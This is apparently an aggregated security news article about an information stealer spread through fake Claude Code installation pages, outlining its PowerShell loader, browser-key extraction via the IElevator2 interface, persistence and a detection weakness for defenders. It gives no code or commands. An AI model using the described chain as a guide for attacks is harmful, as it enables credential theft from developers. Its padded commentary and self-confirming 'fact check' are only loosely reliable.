Listen to this Post
Introduction
A new cyber espionage campaign is exploiting fake installation pages for Claude Code to distribute a previously undocumented information stealer aimed at Chromium-based browsers. The attack focuses heavily on developers, leveraging malicious sponsored search results to trick users into downloading a tampered installer. Once executed, the malware bypasses modern browser protections, extracts sensitive data such as cookies, passwords, and payment information, and quietly exfiltrates it to attacker-controlled infrastructure. Security researchers have linked the operation to rapidly registered domains and a carefully engineered PowerShell-based attack chain designed to evade traditional detection systems.
Summary of the Original Report
A newly identified information stealer has been actively distributed through fraudulent Claude Code installation websites, which are designed to closely resemble legitimate documentation pages. Victims are typically redirected through sponsored search ads that appear when users search for terms like “install Claude Code.” These malicious pages mimic the official interface almost perfectly but replace the legitimate installation command with a modified one that silently redirects users to attacker-controlled infrastructure.
Security researchers from Ontinue’s Cyber Defense Center discovered that the campaign is supported by at least three domains registered within a short six-day window in April 2026. These domains host a deceptive PowerShell installation script located at “/install.ps1,” which appears clean when scanned but behaves maliciously when executed through the fake installation instructions embedded on the page.
Once the victim runs the command, a heavily obfuscated PowerShell loader, approximately 600 KB in size, is downloaded and executed. This loader scans for Chromium-based browsers including Google Chrome, Microsoft Edge, Brave Browser, Vivaldi, Arc Browser, and even niche platforms like Perplexity Comet. It then injects a lightweight native helper into active browser processes.
This helper is designed specifically to exploit the IElevator2 COM interface introduced in Chrome 144, allowing it to extract App-Bound Encryption keys. While similar techniques were previously observed in earlier malware families, this variant is optimized for stealth and modular execution. The malicious helper avoids direct system-level operations, ensuring most detectable activity occurs within the PowerShell layer instead of the injected binary.
Researchers also found that the loader includes persistence mechanisms via scheduled tasks that repeatedly contact command-and-control servers every minute. It also contains geographic exclusion logic that prevents execution in certain CIS countries, suggesting a targeted operational focus.
A critical flaw in the malware’s implementation involves a malformed identifier in the Edge IElevator2 interface call, which causes fallback behavior that can serve as a detection opportunity for defenders. Experts emphasize that developers are the primary target, as compromised systems often contain privileged access to source code, cloud infrastructure, and CI/CD pipelines.
What Undercode Say:
The campaign represents a clear evolution in browser-targeted information theft.
Attackers are no longer relying on simple credential stealers.
Instead, they are building multi-stage injection chains that exploit browser architecture directly.
The use of fake Claude Code installation pages shows strong social engineering alignment with developer workflows.
Sponsored search poisoning is becoming a preferred entry vector for high-value targets.
This reflects a shift from random phishing to precision targeting of technical users.
The PowerShell-first execution model is designed to bypass endpoint detection logic.
By keeping native code minimal, the malware avoids many behavioral sandbox triggers.
The reliance on IElevator2 shows attackers are tracking Chromium security updates closely.
Chrome 144 introduced architectural changes that attackers quickly weaponized.
The separation between loader and helper reduces forensic visibility.
Most malicious activity appears in script telemetry rather than binary execution logs.
This is a deliberate attempt to fragment detection surfaces across layers.
The approach mirrors modern “living-off-script” techniques seen in advanced persistent threats.
Developer machines are being treated as strategic entry points into enterprise systems.
Once a developer is compromised, lateral movement becomes significantly easier.
Access to Git repositories can expose proprietary algorithms and secrets.
Cloud credentials stored in browsers become immediate exfiltration targets.
The malware’s scheduled task persistence indicates long-term surveillance intent.
Geo-fencing logic suggests attackers are avoiding attribution-heavy regions.
This is consistent with organized threat actor behavior rather than opportunistic crimeware.
The malformed identifier bug is a rare operational weakness that defenders can leverage.
It may become a reliable signature for detection pipelines.
Ontinue’s analysis highlights how quickly browser security boundaries are being challenged.
The evolution of App-Bound Encryption bypass techniques is accelerating.
This campaign demonstrates that browser trust models are now actively being reverse engineered.
Security teams must assume browser memory is a hostile execution environment.
Traditional endpoint tools are insufficient without script-level visibility.
The attack chain is optimized for stealth, persistence, and credential harvesting at scale.
Developer-focused targeting increases the blast radius of a single infection.
Supply chain compromise risk increases when CI/CD environments are exposed.
The campaign reflects a broader industry trend toward infrastructure-aware malware design.
Fact Checker Results
✔ The campaign uses fake installation pages to deliver malware
✔ PowerShell-based loaders are used to execute the attack chain
✔ Chromium-based browsers are explicitly targeted for credential extraction
Prediction
This type of browser-native attack is likely to increase as Chromium evolves its encryption and sandboxing mechanisms. Future variants will probably reduce PowerShell visibility even further by shifting more logic into in-memory execution. Developer-focused phishing will continue to rise, especially through sponsored search manipulation. We may also see integration with AI-generated lures that dynamically adapt fake documentation pages in real time, making detection significantly harder for both users and traditional security tools.
🕵️📝Let’s dive deep and fact‑check.
References:
Reported By: www.infosecurity-magazine.com
Extra Source Hub (Possible Sources for article):
https://www.linkedin.com
Wikipedia
OpenAi & Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
Bing
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow UndercodeNews & Stay Tuned:
𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky | 🐘Mastodon
